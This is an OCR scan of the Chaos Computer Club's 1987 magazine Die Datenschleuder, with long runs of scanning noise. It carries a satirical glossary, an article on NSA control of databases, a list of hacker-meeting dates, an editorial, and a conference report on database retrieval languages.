gramme nicht unbewacht zurücklassen kann. >
20247
1939 1
7 1055
53901
139 43
31663
15153
2 n 9 4 .V
6 S 7 6 0
69611
02505
17100
73927
63335
j 5 j -j 8
62725
5353B
83096
367 KS
44662
37092
26469
09671
25406
l 9 ö T 5
02 143
1762 1
16631
40097
59523
1 4939
07222
00111
2681 1
53103
38731
.'6173
23235
26 360
53381
73151
03459
57365
33223
53499
29353
22G36
85100
73138
34 63 4
34999
35184
04451
70427
01393
91994
24341
00905
75376
25776
757 1 1
1 3090
033 16
41833
19201
96262
34162
88166
52137
4 717.;
25477
72773
34337
7 4 366
51382
87521
56635
71950
6 3 71 9
36565
39 033
9 4 493
6642 1
76400
Die Ratenschleuder
Ultravollständiges
maximegaionischstes
Wörterbuch aller Zeiten
(zweite Rate)
BASF:
Byte-Abweisende SchutzFolie.
BIMoMAT:
BürolndustrialisierungsMaschine ohne
MAThecoprozessor.
mSdOS-tähiger Kleinrechner vom Typ FOX-
trottel.
FOXTrottel:
FernOst-XT. BIMoMAT ab 2/3-kompatibel.
FOXtrottel de Luxe:
Leistungsfähiger Trottel bis zur 80986-Klasse.
GIPS:
Gigalnstruktionen Pro Sekunde. 1000 MIPS =
1 GIPS.
GRIPS:
Nachweislich undefinierbare Maßeinheit.
LOGOMAT:
LOGischer AutoMAT. Neudeutsches Kunst¬
wort für Computer.
mSdOS;
meinem System droht Overkill Status.
Betriebskrankheit gefährdeter Seelen.
IMPRESSUM
Die Datenschleuder Numero 20
Das wissenschaftliche Fachblatt für Datenrei¬
sende
D-2000 Hamburg 20
Schwenckestrasse 85
Geonet: Geo1;Chaos-Team
Btx ; 655321
Herausgeber und ViSdPG; Herwart Holland-
Moritz
Mitarbeiter (u.a.);
R. Schrutzki, S. Wernery, A. Eichler,
P. Franck, H. Gruel, M. Kuehn, Esco, Andy
M.-M., S. Stahl, padeluun, KS, jwi, Dietmar
Wintschnig, Poetronic
Vierfarb-Termindruck im Selbstverlag.
April 1987
.31215
27870
22236
64636
o o 7,, 5
50356
55769
43336
54950
02708
53923
61710
55021
31147
41374
41061
34445
544 19
21013
36172
99623
56948
99193
36918
47294
73580
72915
60335
10396
70195
94290
3 318 &
49075
60336
79S51
49663
i44a9
Afi5.9?
94013
78517
04038
77337
Mega-Control
US-Behörde will alle öffentlichen Datenbanken kon¬
trollieren und zensieren
ln der US-Zeitschrift "Chronical of Higher Educa-
tion" wurde 21. Januar berichtet, daß der President
der USA eine Direktive (National Security Directive
145) erlassen hat, mit der die Nationale Sicherheits¬
behörde NSA die Befugnis erteilt wird, öffentlich zu¬
gängliche Datenbanken zu kontrollieren und zu zen¬
sieren, ohne vorher die Zustimmung des jeweiligen
Autors eines Datenbankdokumentseinholenzu müs¬
sen. Datenbanken sind elektronische Informations¬
systeme, die für spezielle Themen oder Winschafts-
branchen Dokumente und Literaturverzeichnisse per
Computer zur Verfügung stellen.
Die Autorin des Artikels, Judith Axier Turner, weist
daraufhin, daß die US-Regierung ein neues Büro der
NSA eingerichtet hat, das für die Sicherheit ALLER
Computersysteme zuständig sein wird, "die empfind¬
liche Informationen speichern könnten - unabhängig
davon, ob sie von Regierungsbehörden gespeichert
werden, der Geheimhaltungspflicht unterliegen oder
der nationalen Sicherheit unmittelbar berühren”.
Dies schliesst auch solche kommerzielle Systeme mit
ein wie Dialog, Nexis, Lexist, u.a.
Frau Turner zitiert, unter anderen, Frau Diane Foun-
taine, Leiterin der Abteilung Informationssysteme im
Büro des stellvertretenden Verteidigungssekretär, die
für Kommunikation, Kommandoslruktur, Kontrolle
und Nachrichtendienste zuständig ist: "Die Frage in
den 80er Jahren ist nicht: "Wird es Einschränkungen
oder. Kontrolle bei der Benutzung kommerziell zu¬
gänglicher Datenbanken sein"; die Frage ist viel¬
mehr: "Wie werden solche Einschränkungen und
Kontrollen angewandt?”.
Robert L. Park der "American Physical Society" be¬
merkte; "Behörden, die darauf (die Direktive, Anm.
d. Red.) zurückgreifen wollen, werden sie auf alles
anwenden, das sie verbergen wollen", darunter auch
Forschungsberichte. Park wies außerdem daraufhin,
daß jeder Bericht, der von einer Behörde finanziert
wird, somit als "empfindlich" eingestuft und unter
Kontrolle gestellt werden kann.
Diese Entwicklung ist sicherlich auch vor dem Hin¬
tergrund des zunehmenden Einsatzes von Telekom¬
munikation durch "radikale" Bewegungen in den
USA zu.sehen. Seinerzeit wurden die bundesweiten
Protestaktionen gegen die Investitionen amerikani¬
scher Universitäten auch mit der Hilfe eines elektro¬
nischen Konferenzsysiems koordiniert.
Die NSA ist in letzter Zeit mehrfalls aufgefallen. Die
Bayerische Hackerpost hatte am 14.12.86 von einem
Artikel in der EG- Zeitschrift "Information Market"
berichtet, demzufolge vertrauliche Informationen eu¬
ropäischer Firmen an konkurrierende US-Firmen
von Überwachungszentren der US-Streitkräfte wei¬
tergeleitet werden. Der Verfasser, ein früherer Mitar¬
beiter der US-Luftwaffe, behauptet, daß dieser Teil
der Überwachung der Telekommunikations bei wei¬
tem das Abhören des sowjetischen Militärfunkver¬
kehrs überwiege.
"Die wichtigste Station für die gegenseitige Sicher¬
heit in der Welt”, so ein früherer Direktor der US Na¬
tional Security Agency NSA, liege in Menwith Hill in
der Grafschaft Yorkshire im Norden Englands. Dort
laufen einige 10.000 Telefonleitungen zu der nahege¬
legenen Relaisstation der britischen Telefongesel-
schaft British Telecom. Menwith Hill werde außer¬
dem durch einen Hohlleiter versorgt, der bereits vor
seiner Modernisierung vor zwei Jahren eine Kapazi¬
tät von 32.000 Telefongesprächen gleichzeitig hatte.
Die NSA ist auch für die Überwachung sämtlicher in¬
ternationale US Telefon- und Datenteilungen, auch
mittels computerunterstützter Stichprobenprüfung,
zuständig. Übersetzung: TT
BEREICH COMPOST USA
Ö2470
51945
05041
98477
42014
133?4
77312
02315
38684
57372
90544
05751
06012
95258
05659
47030
46336
34459
26525
52137
00806
87520
09593
4 5360
73U2
261 18
7231 7
39230
74623
09463
53673
23106
09792
1599.3
60019
94623
79S34
34210
65731
34973
46959
24646
97525
06246
95861
69091
78573
97659
51993
92993
995S6
75427
1 4654
91045
68607
02099
01260
63187
04934
17807
91739
24071
94599
63230
60254
70790
17745
27513
18630
99822
34730
36076
65368
66355
51646
77029
1 1336
82756
31072
i o 3 4 6
7261 1
37054
90795
36533
45386
37196
23585
63126
19337
15677
41 ■ S7
■33527
72292
25947
4 3373
73569
55334
56246
30101
39057
2787;
01d51
29666
■36764
45137
24656
53730
40244
3694 1
40314
4337:
29578
4 7348
49000
30194
77388
02046
0.7:4ö
60342
87535
18433
64959
1 9508
2b'o83
23206
5221 2
31041
90443
04724
79492
91342
28495
19700
22601
31043
00624
10717
9 7150
279.’4
-3 3 J 6 3
40799
59605
31446
05..*2-.
04885
23972
91765
V c) 7 6 fl
1 066 7
31193
7932 3
72457.
35720
96075
82277
17843
SDie S>aten^c^reuber
^Datcn^cl^Ceubcr
336 16
13592
61289
62261
18129
45592
74627
ä7137
79448
75867
53657
54496
1 4076
11931
12595
85126
557 59
73457
30153
33642
63076
79354
43385
76171
53334
62325
27057
20053
03988
23949
90342
5956 6
23297
57924
88735
02925
91668
25994
45699
46559
92658
45476
26945
23730
51650
1 7206
74785
41788
79822
76906
53665
064 1 9
10973
43452
B87B3
35621
72615
62695
82654
47820
56729
97756
42632
53215
94294
41803
99452
17000
09054
26507
63095
58846
59951
71709
14760
74371
36893
31946
90909
91904
50129
03070
99566
22662
03031
82649
36573
36984
19555
77696
37376
24910
35286
56866
07600
56602
56054
4571 1
33728
68402
05574
41603
08370
52312
24258
72234
38354
12317
94813
88550
07568
9331 1
24935
33631
B6352
87033
79934
56926
19931
79452
-33640
87429
59113
07474
534 1 9
55142
03517
26194
20034
55091
70345
6823b
82003
97739
45584
26792
14273
47756
00796
44279
20270
83121
50156
40634
13416
17166
44306
9B154
83764
47157
39001
21217
04154
79725
91993
94332
53649
50514
771,37
93991
47205
21952
70793
96137
62110
72384
94290
61635
76045
96231
25350
60685
37651
4 2 3 1 1
53496
65683
71511
66042
20796
39446
6621 1
63255
15772
90709
7847.3
1 5627
82775
98783
13649
19512
5 7433
32S79
3771 5
71459
09106
484 16
42678
-33994
972-36
74420
17586
2:694
021 5'^
40792
44805-
41255
36043
13179
92696
739 15
75424
19296
6073 1
23937
63542
1 3 9 23
06173
76753
9587 1
1 4361
04089
40996
60894
71413
34069
8 3629
93675
3 62 62
15452
47293
4642 1
37528
91079
38438
1 3060 95552 63272 08375 1 3629 3:.?06
67372 21430 1957? 37937 3607; 10725
42772 8907 1 73235 43743 74 355 73r^6
65117 16618 33088 1129! 20245 20404
86822
00072
3440-3
S0254
43:0;
3.34:5
41373
84653
80259
I50t4
4527 1
05770
00445
21097
/-3558
59976
2 2 0 55
43494
16217
1 4939
53239
34216
03114
06:95
07184
90427
79925
85527
43035
2i 39
63356
79013
07640
60421
39337
3387:'
44601
70942
609:7
2:011
7:133
134266
43336 51780 00217 19034 49234 26426
629:2 61456 00433 73938 69335 55534
34530 04264 81347 39892 15627 08609
56506 29340 40526 49432 44261 44566
59212 91225 64809 35696 55009 15430
64261 34252 66847 25949 14314 23939
88454 32486 32/46 18420 46655 98533
23122 10466 2593? 01417 12103 44603
42716 i6o!9 00125 71058 70793 21756
96985 44013 39762 20967 49454 18548
71184 46433 94699 01626 98351 60734
39245 1 4053 94004 6.395; (,7337 3545;
97003 07051 lö363 25194 37701 13976
40023 27648 41416 05372 06184 13529
71391 54019 63825 32393 091 49 663:.4
57535 71427 31349 20163 94644 33249
90373 86069 00807 27093 27673 12758
19665 63941 14B96 17163 32930 45513
97295 0663’ 60474 09154 20423 42999
35410 25329 1 1 350 224 16 O07(,9 43.I66
35742 42522 53902 69390 34314 35645
i:.O30 69925 19959 043o3 04020 42926
74125 73422 44776 55841 -738ö 17173
72654 62035 49S:? 4493? 4673' 3509;
95316 52632 07225 RO?2:. 63963 45’öl
2a;30 33006 56’33 31122 89305 30914
05’26 10365 33434 53731 01653 15116
753:2 :7o74 33'0! 4329! 6'4:9 20151
2550 ' 3257; 'O'IO 4;6i4
9324 1 46'8a 4’.’'2 50 ’6 84260 6:.3?3
52'35 4293 0 ;3.:'3 "'i:?: if;:.3g -;i’c
42003 043,68 /o'.'.o 2i35o' 41 ö3I 00-33:
2 3/0; 14433 1 ’6 0 0 M 6 6 3 4:0 3 5372 1
:3o4: ol’OJ' 31400 ;;5C- ;;;g3 ,3-^7
2 3 3 - Ik ‘j 7 ly 1 •'5 i; f- ■ w 1 •' i r>. C r ^ ~ 31; Z-
&er IDatenScl^leuber
DM 3,00
Numero 21 - Juni 1987
Postvertnebsstuck
C9927F
Hacker-Meetings - Wichtige Termine
inoJ>i
m
h
Mo
28.08. - 30.08. Sysoptreffen in Berlin
Der IPN, CCC und CAC laden zum Treffen
der Mailboxbetreiber. Veranstaltungsort ist
der Mehringhof in Berlin. Anmeldung bei: IPN,
H.Nopper, Brusendorfer Sti. 20,1 Berlin 44.
28.08. - 14.09. Internationale Funkausstellung Ber¬
lin
Die Konsumelektronik läßt Grüßen.
Hackertreff Dienstag am Poststand um 16 Uhr.
Tel; eh immer besetzt
Btx: nö
Mbx;
Treffen: Montag 20 Uhr im Kaffe Hardenberg,
Hardenbergstr. 10, Berlin 12, nähe Zoo.
CCC-Rhein-Main (DS-RED Rhein-Main)
C/o E.Engelter
Postfach 1201
D-6073 Egelsbach
Tel: 06103 4274
Btx: nö
Mbx: IFX2:E.EngeIter
Treffen; nö
12.09. - 13.09. CCC-Workshop in Hamburg
Beginn der Testphase von BTXNET. Mailboxbe¬
treiber beginnen mit Testbetrieb
eines eigenen Netzes. Ort: Eidelstedter
Bürgerhaus. Auf Einladung.
19.10. - 23.10. SYSTEMS in Müchnchen
Hackenreff Dienstag am Poststand 16 Uhr.
28.12. - 29.12. Chaos Communication Congress
1987 - Hamburg
Die europäische Hackerpany. Näheres im Oktober.
Weitere Hinweise in den Btx-Programmen des CCC,
CAC undderBHP.
Erreichbar über *655322,,.
[\ .^1 Bitia nicht
J v«rg«st0n
CCC
Chaos Computer Club e.V.
Schwenkestraße 85
D-2000 Hamburg 20
Tel: 040-4903757 (040-483752)
Btx: *655321,,
Mbx; Geol;Chaos-Tcam
Clinch;Chaos-Team
Treffen: Dienstags gegen 19 Uhr in der ÖILE
CCC-Berlin (Ortsgruppe)
c/o Vinyl Boogie
GleditschstratJe 45
D-1000 Berlin 30
CAC
Computer Anists Cologne e.V.
Postfach 300308
D-5000 Köln 30
Tel; 0221-381418, 0221-5503749
Btx: (17) *92016306,,
Mbx: keine Meldung
Treffen; Jeden 2. Samstag, 14-19UhrimJugendpaik
unter der ZoobrUcke Sachsenbergstr.
(Nicht in den Soramerferien).
BHP
Bayerische Hackerpost
c/o BASIS
Adalberisr. 41b
D-8000 München 40
Tel: 089-808447
Btx; (32) *92049204,,
Mbx: IFXl: BHP-RED
Treffen: Jeden Donnerstag ab 19 Uhr in den
Mathäser-Stuben (U-Bahn Messegelände oder S-
Bahn Hackerbriieke) in der 3. Woche ist es ein
Freitag!
IPN
Inter Pool Net e.V. (Verein von Mailboxbetreibem)
c/o J.Schillte
Veledastraße 2
D-5000 Köln 1
Tel: 0221-381418
Btx: nö
Mbx; 0221-387686 (38N1D)
Treffen; Nächstes Treffen zur IFA in Berlin.
Adressen und Treffen, soweit sie uns vorliegen.
Keine Gewähr für die Angaben.
Snlciidri|lciiucr
Seite 2
Numero 21 - Juni 1987
Editorial
Lieber D ATENS CHLEUDER-Leser,
einige Dinge begreifen selbst wir recht spät. Andere
begreifen wir, versäumen es aber, entsprechend zu
handeln. Folgerichtig bleibtEtliches liegen und war¬
tet darauf, aufgearbeitet zu werden. Das sei hiermit
getan.
Die DATENSCHLEUDER erscheint nunmehr im
dritten Jahr.
Nach einerlängeren schöpferischen Pause im letzten
Jahr haben wir es geschafft, wieder einigermassen
regelmäßig herauszukommen. Das ist nicht zuletzt
PeterGlaser zu verdanken, den wir trotz - oder wegen
- seines Abstandes zum CCC im Zuge einer psy¬
chologischen Geiselnahme als Scheffredaktör ge¬
kapert haben. Mit Hilfe eines erlauchten Kreises von
Zuarbeitem (huhu Didi !!) hat sich die DATEN¬
SCHLEUDER zu dem entwickelt, was jetzt in Eu¬
ren/Ihren Händen liegt.
Teststop-Publishing war für die Redaktion noch nie
ein Fremdwort, aber erst die Entwicklungen der
jüngsten Zeit, unter anderem die zauberhaften
Textkonvertierungs- und Filterprogramme von Vic,
machen es uns erstmals in der Menschheitsge¬
schichte möglich, die Druckvorlagen in Eigenarbeit
zu erstellen. Am gerüchteumrankten Prototypen für
denchaotypischen Vierfarbkartoffeldruck wird wei¬
terhin rege gearbeitet. Schwierigkeiten bereitet der
Druckertreiber und die Frage, ob auf gentechni¬
schem Weg eine Matrix-Kartoffel gezüchtet, oder
besser ein Kartoffelgaslaser entwickelt werden soll.
Der CCC ist seit mehr als einem Jahr ein eingetra¬
gener Verein.
Zu seinen Aufgaben gehört laut Satzung auch die
Herausgabe der DATENSCHLEUDER. Wir hatten
es bisher beim alten Stand belassen und Wau als
SntcnSdjIcubcr
Herausgeber angefühn. Das hat sich mit dieser Aus¬
gabe auch geändert. Herausgeber ist nunmehr der
Chaos Computer Club e.V. und Verantwortlich im
Sinne des Pressegesetzes ist Reinhard Schrutzki.
Das hat aber nur Bedeutung auf dem Papier und bei
allfälligen Rechtstreitigkeilen. Die DATEN¬
SCHLEUDER ist und bleibt ein Produkt, das von
einer Gruppe überwiegend gleichgesinnter (u nd
gleichgestreßter) Menschen produziert wird.
Daß hinter dem Projekt DATENSCHLEUDER auch
Menschen stecken, hat so mancher Abonnent dop¬
pelt und dreifach zu spüren bekommen: so oft haben
manche nämlich die jeweils aktuelle Ausgabe zu¬
geschickt erhalten. In der Aboverwaltung hat es
Irrungen und Wirrungen gegeben. Es wird daran
gearbeitet, sic zu beseitigen. Deshalb hier wieder die
Bitte, Nachsicht zu üben, wenn mal wieder etwas
nicht ganz wie vorgesehen klappt. Dazu siehe auch
den Beitrag “Von Menschen und Mäusen“ ira vor¬
liegenden Heft.
Nicht geklappt hat in der letzten Ausgabe die druck¬
technische Wiedergabe des Bestellfetzens. Offenbar
war unsere Vorlage zu blass. Ergebnis war eine mit
kryptischen leeren Feldern gemusterte Seite. Nur
wenige Leser haben entsprechend reagiert und nach
dem Moto “Raum für eigene Eintragungen“ Feh¬
lendes selbst ergänzt.
Reinhard Schrutzki
editor21.ds 198706032000
goblin
Numero 21 - Juni 1987
Seite 3
Die Quatsch-Explosion
Bericht von der ONLINE-Tagung /
INFOBASE 87 in Frankfurt
- SO bezeichncte ein Vortragender auf der ONLINE-Tagung
wahrend der Infobase 87 in Frankfurt die ungeheure Zunahme
an Datenbanken und deren Qualiiät. Viele Daienbankanbieter
begnügten sich einfach damit, Fachzeitschriften o.ä. abzu¬
schreiben. Diese werden dann schlicht hintereinanderweg ein-
gespeist, einen Abstract und eine Süchwortzuordnung gibt es
oft nicht. Sinnvoll, so der allgemeine Gmndtenor, sei aber die
Volltextdalenbank nur in einigen wenigen Ausnahmen. Besser
arbeiten Hesse sich mit Datenbanken, die einen Abstract böten
und/oder auf die Quelle verwiesen. Allen Datenbanken ge¬
meinsam aber ist, dass sie durchschnittlich 12-24 Monate
hinter der Aktualität h^hinken.
Ausnahme ist da z.B. eine Datenbank, die die Urteile des
höchsten US-am«ikanischen Gerichts beinhaltet. Hai der
Richter sein Urteil gesprochen, wird ihm der Uncilstexl aus der
Hand gerissen, jemand stürzt damit zum Schreibpool und das
Urteil wird in die Datenbank eingefügt. So ist es möglich, daß
dieseUrtßileschon wenigeStunden nach Verkündungabnifbar
sind.
Aids3omnot, VWWW und Zvei
- von Grips, Stain bis CCL reicht das Spektrum bei Daten¬
banken.
Das "Who iS Who - Jahrbuch zur tnfobase 8?", Adressbuch der
ONLINEszene Uber Personen, Firmen, Datenbanken, deren
Produzenten und Anbieter, verzeichnet Stichwörter zu etwa
>.200 Datenbanken.
1 (DM 29,50 zu beziehen bei: B.Team, B. Breidenstein GmbH,
Untermainkai 83.6 Frankfun l)
Das Angebot ist groß genug (so groß, daß es schon wieder
Datenbanken über Datenbanken gibt). Fehlen nur noch die
Benutzer.
Als Hauptmängel der Datenbanken sind aufzuführen:
- Die Organisaiionsstruklur (Indexierung) der Datenbanken.
Sie ist oft so angelegt, daß man erst einmal nach nach dem
richtigen Stichwort suchen muß, bevor man mit der eigentli¬
chen Recherche beginnen kann.
- Mangel an Informationen.
Datenbanken, die zu einem speziellen Gebiet nicht alle In¬
formationen, auch die aktuellen, enthalten, haben wenig Sinn.
Die Retrieval*(Such)-Sprachen sind derart unterschiedlich,
daß man sich meist nur auf einem Host (Rechner, der Daten-
I banken anbieiet) auskennen kann. Dazu später unter Grips,
i Stairs, CCL... mehr.
- Oft exsisüen die notwendige Hardware nichL Es entstehen
Amchaffungskosten. die viele abschrecken.
- Beim Zugriff auf Datenbanken außerhalb der BRD oder
Europas kommt cs des öfteren zu Problemen, (siehe Know¬
ledge Means Money).
- Eine Datenbankrecherche ist relativ teuer. Es ist eine genaue
Abwägung notwendig, ob dieses neue Medium winschafllich
eingesetzt werden kann, (Exemplarische Kosien-Nuizcn-
Rechnung s.u.).
- Einige Datenbankproduzenten scheinen nach dem Ex-und-
hopp Prinzip zu produzieren. In IctzterZeitgabesnicht nur eine
Quatsch-Explosion sondern auch ein erstaunliches Ver¬
schwinden von Datenbanken ohne Ankündigung vom Markt.
Thomas M. Koch (Koch Consult, Frankfurt/Main) gab einige
qualitative Anhaltspunkte zur Auswahl einer Datenbank:
■ Einfachheit im Aufbau
- Abfragemethoden, die der natürlichen menschlichen Sprache
angepaßi sind
- Relationale Verknüpfungsmöglichkeiten
- Auiomaüsiene Lieferung von intelligenten Entscheidungs-
Vorschlägen für relationale Datenbanksuche
- Flexible Kommunikalionsschniustellen
- Mischung von Texidaien, numerischen Daten und Grafiken
im Computer des Anwenders. Dies sei nur sehr selten alles
zusammen bei einem Host realisiert. Jedoch sollte man darauf
hinarbeiten, daß dies geschehe.
Für Koch steht jede Datenbank auf drei Säulen:
- Qualität
- Geschwindigkeit
- Preis
Zum Schluß noch die Auflösung der Datenbankküizel von
oben:
“Aids“ ist, wie mancher sich schon gedacht haben wird, eine
Datenbank über Aids; in “Bonmot“ kann man StMuche und
Zitate abrufen; “VWWW“ kommt natürlich von VW und
beinhaltet Informationen zum Kfz-Bau; “Zvet“ ist ein Ein¬
kaufsführer durch die Elektro- und Elektronikindustrie.
“Grips“, “Stairs“, “CCL“ - das sind Namen von Retricval-
sprachen (Such-). Sie sollen den Fragesteller in die Lage
versetzen, schnell und einfach seine Antwort zu finden.
Inwieweit das zuirifft ist fraglich. Es scheint, daß etliche
Datenbankbenutzer sich beim Einsatz dieser Sprachen die
Haare raufen: so viele Glatzköpfe wie auf dieser Messe sicht
man sonst seilen auf einem Haufen. Durchaus verständlich,
bedenkt man, daß es etwa so viele Retrieval- wie Program¬
miersprachen gibt, von denen es wiederum (Basic-)Dta]ekie
gibt. Im Gegensatz zu Programmiersprachen kann sich der
Benutzer jedoch meist nicht aussuchen, in welcher Retrieval-
sprachc er seine Frage stellen möchte. Jeder Host. teilweise
jede Datenbank auf einem Host. verlangt eine andere Sprache.
Nun gibt es Relricvalsprachen. die verhalten sich wie Basic-
Dialekie zueinander. Ein bestimmter Gnindbefehlssalzgleichl
sich stark, die Syniaxregeln sind dieselben. Andere Reirie-
valsprachen vehiien sich wie Assembler zu Lisp: nichts ge¬
meinsam. So richtig neu wird es für den Benutzer aber erst,
wenn die Befehle gleichlauten, die Syntax jedoch eine andere
ist. So sucht man unter Stairs (IbK^ mit dem Kommando
“..sea" für “search“. Das wird dann erweitert, z.b. “..sea Chaos
Computer Club and DTX“. Doch unter Bi^Search (Bertels¬
mann) lauter das Kommando entweder “..search" oder “..s“
(“..s Chaos Computer Club or Hacker“). Befindet man sich
jedoch auf einem Host der die Common Command Language
(CCL) der Europäischen Gemeinschaft verwendet (z.b. Echo),
so lautet der Befehl “f ‘ für find (“f Chaos Computer Club not
Chaos Communication Congress“).
GRIPS wiederum ist eineErweileiung (=Dialekl) von CCL. Es
kennt zusätzliche zu den CCL Kommandos TAB Kommandos
(Ausgabe von Profiltabellcinträgen = bereits eingegebene und
verknüpfte Suchbegriffe), MAIL Kommandos (für Briefe an
den Host) und ORDER Kommandos (zum Bestellen von Do¬
kumenten).
^nJcn^ifjleuber
Dietmar Strauch (PR(XjRIS • Projektgruppe Informations¬
systeme GmbH. Berlin) stellte in seinem Vonrag "Founh
Generation Retrieval Software • blicken Sic noch durch?“ eine
rosige Zukunft unter dem Süchwort ’Konfigurierbarkeit’ dar:
“Die Aufgabe der nächsten Zeit besieht darin. Baukästen für
Benuizerschnitistellen zu entwerfen, aus denen dann benul-
zerorientiert bzw. anwendungsspezifisch konkrete Ausfor¬
mungen gebildet werden können. Perspeküvisch wird diese
Entwicklung dazu führen, daß wir im Gebiet der Dialogtech¬
niken zu einer Bcnulzerprogrammicrung kommen. Jeder Be¬
nutzer stellt,gestülztauf wisscnsbasicflc Komponenten, die für
Jhn geeigncic Schnittstelle aus den zur Verfügung stehenden
Elementen zusammen.“
Na den mal lau! Das wird viele Neueinsteiger abschrecken.
Bevor die ihre erste Abfrage machen können müssen sie erst
mal den Host maßschncidem (-regeln). So schön das auch
wäre, aber nur geübte Daienbankbenutzcr werden in der Lage
sein, diese Schnittstellen zu programmieren (für alle anderen).
Wer sich näher mit Retrievalsprachen beschäftigen will, sei auf
folgende Publikationen hingewiesen:
- Information Retrieval miiGrips/Dirs3. Kurzbeschreibung der
wichtigsten Grips/Dirs3-Kommandos für den LINE-MODE.
Stand: April 1984. Redaktion: Ingrid Crüger (Sfl-
Retrievalhüfen 2); Frankfurt am Main: gid, 1984 (Adresse
unten); 64 Seiten DIN A4, geheftet DM 10,00.-.
- Information Retrieval mi i Grips/Dirs3. Kurzbeschreibung der
wichtigsten Grips/Dirs3 Kommandos für den PAGE-MODE.
Stand: April 1984. Redaktion: Ingrid Crüger (Sft-
RctricvalhUfen 2); Frankfurt am Main: gid, 1984 (Adresse
unten); 65 Seiten DIN A4, geheftet DM 10,00
Diese beiden Hefte sind Einführungen in die Abfragesprache
Grips/Dirs3 anhand von Beispielen. Sie sind für GripsA>irs3
Benutzer geschreiben und sollen dem Anfänger als Gedäch-
nisstfllze und später als Nachschlagewerk bei der Arbeit am
Bildschirm dienen.
- Information Retrieval mit STAIRS. Kurzbeschreibung der
wichtigsten STAIRS-Kommandos anhand von Beispielen.
Stand: Juli .1982. Radakiion; Ingrid Crüger (Sfi-
Reirievalhilfcn 1); Frankfurt am Main: gid, 1982 (Adresse
unten); 81 Seiten DIN A4, geheftet DM 10,00.-.
Aus dem Inhalt: eine Einführung in das Information Retrieval
mit STAJRS/Vs - Allgemeines zur Dialog-Struktur eines
STAIRS Dokuments - Aufbau einer STAIRS-Daienbank -
Zugriffsschulz Eingangsdialog - Beschreibung der STAIRS-
Befehle.
Diese drei Werke sind zu beziehen bei:
Gesellschaft für Information und Dokumentation (gid)
Zailralbereich Ergebnislransfer
Posif^h 710363
Lyoner Strasse 4448
D-6000 Frankfurt 71
Darüber hinaus:
“Das unsichtbare Element - CCL-Training“
Handbuch für Benutzer, Euronet Diane.
Zusammengesielli von; Gruppe zur Förderung der Europäi¬
schen
Fachinfomnaiionsmarkles, 177, Route d Esch, L-1471 Lu¬
xembourg,
Tde.: 352488041. Telex; 2181;
KoniaJcipersoncn; Herr Haber, Herr Cornelius.
S>a<cnSd)lciibct
Turorials (Lemdikellen);
DSO (Data Star Online)
wird unter dem Namen TECPU-Programmierte Unterweisung
für Retrievalsprache DSO vom Fachinformationszentrum
Technik für
DM 35,- vertrieben.
(Fiz-Technik), Postfach 6(X)547, Osibahnhofstrasse 13,
6 Frankfurt 1. Tel. 0694308-225. Telex 4189459 fizi d)
JURIS
Beim Verlag C.H. Beck (Postfach, 8 München 40) gibts eine
Schulungsdiskelle für 118 DM und einen Dialogschulungs-
(Plastik)-Ordner (beinahe so dick wie ein Schönefelder oder
Satorius) für 148 DM.
(DSO und JURIS für 220 DM).
Im Grunde bietet jeder Hostbetreiber Schulungsseminare an.
wenn man bei ihm einen Vertrag unterschrieben hat Die
Zeitung OLBG-Info, Das Nachrichienblalt der deutschen
ONLINE-Benuizergruppe in der DGD e.V. (Deutsche Ge¬
sellschaft für Dokumentation e.V., Westendstraße 19,6 Frank¬
furt 1) im Heft 1/2 1987 über den Quick-Guide für Koman-
dosprachen:
“Die britische ONLINE-Benuizergruppe hat uns milgeteill,
daß sie den Ukolog Quick Guide to ONLINE Commands 1987
herausgegeben haL Darin werden die Kommandos der 12
meistgenutzten Hosts (wie Data Star, Dialog, Dimidi. Blaise,
Esa-lris, Infoline-SDC, STN, Telesysiems. Questel, Dat^Ive
u.a.) auf 4 Seiten inTabellenfonn für den schnellen Zugriff am
Terminal aufgelistet. Ein Informationsblatt zum Quick Guide
kann bei Sheüa Webber, Briüsh Library, 2 Sheraton Street,
London W 1V 4 BH. Tel. 01-636-1544, angefordert werden.
Den QuiclC'Cuidelcann man zum Preis von lObriiischenPfund
bestellen bei: Institute of Information Scientisis, 44 Museum
Street, London WC lA ILY, Tel. 01-831-8003“
Einige mögen erstaunt sein über die Datumsangaben (Stand...)
in den Datenbanken. Dies ist jedoch verständlich, wenn man
die Klage von Dr. Hans Schlarmann (Amwalt) in sdnem Vor¬
trag (JURIS-Dalenbank in der Kanzlei) hört. ^ spricht davon,
daß es nicht ausreiche, einmal eine Retrievalsprache zu lernen.
Ständig gebe es Erweiterungen und Änderungen, man müsse
also andauernd sein Wissen aktualisieren. Für einen Recht¬
sanwalt meist eine - wegen Zeitmangels - nicht lösbare Auf¬
gabe. Folgerung: Software muß her, die die Suche erleichtert,
mit der man auf allen Hosts die gleiche Benutzeroberfläche hat
Diese Idee hatte die Firma Softconirol (Fahrenkrön 125, 2
Hamburg 71, Tel. 040-6432766,GEOT.Sofikontrol) auch. Sie
entwickelte das Programm METALOG. Es bietet eine ein¬
heitliche Benutzeroberfläche für (bisher) die Hosts Juris, Di¬
midi, dpa, Genios, Data Star (je 250 DM) und die Mailboxen
GEOl, GE03 und Telebox (je 150 DM). Als Grundlage be¬
nötigt man das Phrogramm Terminal Control (490 DM). ME¬
TALOG bietet dann eine Menü-Pull-E>own-Abfragc. Die we¬
nige Erfahrungen, die man auf der Messe damit sammeln
konnte (an dpa hier nochmals vielen Dank: war sehr infor¬
mativ), zeigten: wenn man ungefähr weiß, wie man vorzugehen
hat, z.b. welche Datenbank auf einem Host man anzuwählen
hat, um an die gesuchten Informationen zu kommen, kann man
Recherchen durchführen, ohne übermäßig viel lernen zu müs¬
sen.
SqHq 5
Seile 4
Numero 21 - Juni 1987
Numero 21 - Juni 1987
Ähnliche Gedanken machte sich die Firma Bertelsmann. Für
ihre Patent-Datenbank PATOS und die von ihnen angeboiencn
deutschsprachigen Wirtschafisdaienbanken entwickelten sie
MENTOR, eine vereinfachte Benutzcrfühmng. Im Gegensatz
zu METALOG, das auf dem PC des Benutzers läuft, läuft
MENTOR auf dem HosL Das hat den Vorteil, daß es allen
Hostbenutzem zur Verfügung steht und man nicht an eine
bestimmte Hardware (bei METALOG IBM oder 1(X)% kom¬
patibel) gebunden ist. Wählt man sich zu Bertelsmann durch,
fragt einen der Hosl, ob man mit BRS/Search (s.o.) oder
MENTOR arbeiten will. Wählt man letzteres an, unterstützt
einen MENTOR mit Bedienungshinweisen, Dalenbankbe-
schreibungen, Hinweisen zu Eingabemöglichkeiten und -for¬
malen, sowie zu Menüverzweigungen über Sieuerfunkiionen
und mit ausgearbcileten Suchstrategien. MENTOR zeigt in der
